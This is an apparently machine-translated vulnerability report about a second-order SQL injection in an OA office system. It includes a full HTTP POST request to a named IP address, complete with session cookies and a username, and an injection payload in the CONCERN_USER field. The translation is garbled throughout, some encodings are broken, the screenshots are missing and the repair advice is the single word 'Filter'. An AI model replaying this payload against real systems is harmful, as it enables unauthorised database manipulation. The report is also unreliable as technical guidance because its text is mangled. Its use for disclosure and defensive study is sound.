Mastery oa at the secondary injection vulnerability-vulnerability warning-the black bar safety net

2015-03-15T00:00:00
ID MYHACK58:62201559926
Type myhack58
Reporter 路人甲
Modified 2015-03-15T00:00:00

Description

Brief description:

Paralysis of the software

Detailed description:

! QQ 图片 20141215110029.jpg

Add the attention of the people, many functions rely on the data

code area

POST http://121.40.134.14/general/person_info/concern_user/update.php HTTP/1.1

Host: 121.40.134.14

Connection: keep-alive

Content-Length: 7 0

Cache-Control: max-age=0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8

Origin: http://121.40.134.14

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36

Content-Type: application/x-www-form-urlencoded

Referer: http://121.40.134.14/general/person_info/concern_user/

Accept-Encoding: gzip, deflate

Accept-Language: EN-us,EN;q=0.8

Cookie: UserSelectRole=0; PHPSESSID=3242388d3217ca04d2440224594bd5db; USER_NAME_COOKIE=wangde; OA_USER_ID=wangde; SID_5=f48e5e5e; hideTopbar=1

CONCERN_USER=user%2 8%29chenqiang%2C&CONCERN_USER_NAME=%CB%D5%C3%F72%2C

Submitted

code area

CONCERN_USER=user%2 8%29chenqiang%2C'%27wang'de%2C&CONCERN_USER_NAME=%CD%F5%B5%C2'%2C'

Lead

! QQ screenshot 2 0 1 4 1 2 1 5 1 1 1 0 0 5. png

Vulnerability proof:

!

Repair solutions:

Filter